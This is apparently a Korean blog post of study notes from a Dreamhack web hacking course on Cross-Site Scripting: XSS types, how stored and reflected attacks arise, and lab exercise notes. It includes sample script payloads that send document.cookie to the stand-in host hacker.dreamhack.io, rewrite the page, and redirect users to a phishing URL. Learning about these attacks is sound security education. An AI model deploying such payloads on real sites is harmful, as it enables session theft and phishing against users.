Client-Site-Scripting (XSS)
클라이언트 사이드 취약점 : 웹 페이지의 이용자를 대상으로 공격할 수 있는 취약점
클라이언트 사이드 취약점의 대표적인 공격 : Cross Site Scripting(XSS)
XSS
공격자가 웹 리소스에 악성 스크립트를 삽입해 이용자의 웹 브라우저에서 해당 스크립트를 실행할 수 있다. 해당 취약점을 통해 특정 계정의 세션 정보를 탈취하고 해당 계정으로 임의의 기능을 수행할 수 있다.
XSS 발생 예시와 종류
XSS 공격은 이용자가 삽입한 내용을 출력하는 기능에서 발생한다.
*예시 : 로그인 시 출력되는 “안녕하세요, OO회원님”과 같은 문구 또는 게시물과 댓글
| 종류 | 설명 |
| Stored XSS | XSS에 사용되는 악성 스크립트가 서버에 저장되고 서버의 응답에 담겨오는 XSS |
| Reflected XSS | XSS에 사용되는 악성 스크립트가 URL에 삽입되고 서버의 응답에 담겨오는 XSS |
| DOM-based XSS | XSS에 사용되는 악성 스크립트가 URL Fragment에 삽입되는 XSS *Fragment는 서버 요청/응답에 포함되지 않습니다. |
| Universal XSS | 클라이언트의 블아ㅜ저 혹은 브라우저의 플러그인에서 발생하는 취약점으로 SOP 정책을 우회하는 XSS |
XSS 스크립트의 예시
자바스크립트는 이용자와의 상호 작용 없이, 이용자의 권한으로 정보를 조회하거나 변경하는 등의 행위가 가능하다. 공격자는 자바스크립트를 통해 이용자에게 보여지는 웹 페이지를 조작하거나, 웹 브라우저의 위치를 임의의 주소로 변경할 수 있다.
자바스크립트는 이 때문에 XSS 공격에 주로 사용된다. 자바스크립트를 실행하기 위한 태그로는 <script>가 있다.
자바스크립트를 이용한 XSS 공격 코드 예시
<script>
// "hello" 문자열 alert 실행.
alert("hello");
// 현재 페이지의 쿠키(return type: string)
document.cookie;
// 현재 페이지의 쿠키를 인자로 가진 alert 실행.
alert(document.cookie);
// 쿠키 생성(key: name, value: test)
document.cookie = "name=test;";
// new Image() 는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정. 공격자 주소는 http://hacker.dreamhack.io
// "http://hacker.dreamhack.io/?cookie=현재페이지의쿠키" 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
new Image().src = "http://hacker.dreamhack.io/?cookie=" + document.cookie;
</script>쿠키 및 세션 탈취 공격 코드
<script>
// 이용자의 페이지 정보에 접근.
document;
// 이용자의 페이지에 데이터를 삽입.
document.write("Hacked By DreamHack !");
</script>페이지 변조 공격 코드
<script>
// 이용자의 위치를 변경.
// 피싱 공격 등으로 사용됨.
location.href = "http://hacker.dreamhack.io/phishing";
// 새 창 열기
window.open("http://hacker.dreamhack.io/")
</script>위치 이동 공격 코드
- Stored XSS : 서버의 데이터베이스 또는 파일 등의 형태로 저장된 악성 스크립트를 조회할 때 발생
예시 : 게시물과 댓글에 악성 스크립트를 포함해 업로드 - Reflected XSS : 서버가 악성 스크립트가 담긴 요청을 출력할 때 발생
예시 : 게시물 검색 시, 검색 문자열에 악성 스크립트가 포함되어 있는 경우
Reflected XSS는 Stored XSS와는 다르게 URL과 같은 이용자의 요청에 의해 발생합니다. 따라서 공격을 위해서는 다른 이용자를 악성 스크립트가 포함된 링크에 접속하도록 유도해야 합니다. 이용자에게 링크를 직접 전달하는 방법은 악성 스크립트 포함 여부를 이용자가 눈치챌 수 있기 때문에 주로 Click Jacking 또는 Open Redirect 등 다른 취약점과 연계하여 사용합니다.
요약
Cross Site Scripting (XSS): 클라이언트 사이드 취약점, 공격자가 웹 리소스에 악성 스크립트를 삽입해 이용자의 웹 브라우저에서 해당 스크립트를 실행하는 취약점.
Stored XSS: 악성 스크립트가 서버 내에 존재, 이용자가 저장된 악성 스크립트를 조회할 때 발생
Reflected XSS: 악성 스크립트가 이용자 요청 내에 존재, 이용자가 악성 스크립트가 포함된 요청을 보낸 후 응답을 출력할 때 발생
Exercise: XSS, Exercise: XSS-2
해당 문제는 XSS를 통해 다른 이용자의 쿠키를 탈취해야 하기 때문에, 다른 이용자가 방문하는 시나리오가 필요하다. 이러한 기능은 셀레늄을 통해 구현했다.
*셀레늄(Selenium) : 웹 애플리케이션 테스팅에 사용되는 파이썬 모듈로, API를 통해 웹 드라이버(크롬, 사파리 등)를 사용할 수 있다.
'보안 > 드림핵 강의' 카테고리의 다른 글
| [Reverse Engineering]x86 Assembly 정리 (2) | 2025.04.01 |
|---|---|
| [Reverse Engineering]Binary & Analysis 정리 (0) | 2025.03.31 |
| [Web Hacking]Cross-site Request Forgery (CSRF) 정리 (1) | 2025.02.04 |
| [Web Hacking]Cookie & Session 정리 (0) | 2025.02.01 |
| [Web Hacking]Background - Web 정리 (0) | 2025.02.01 |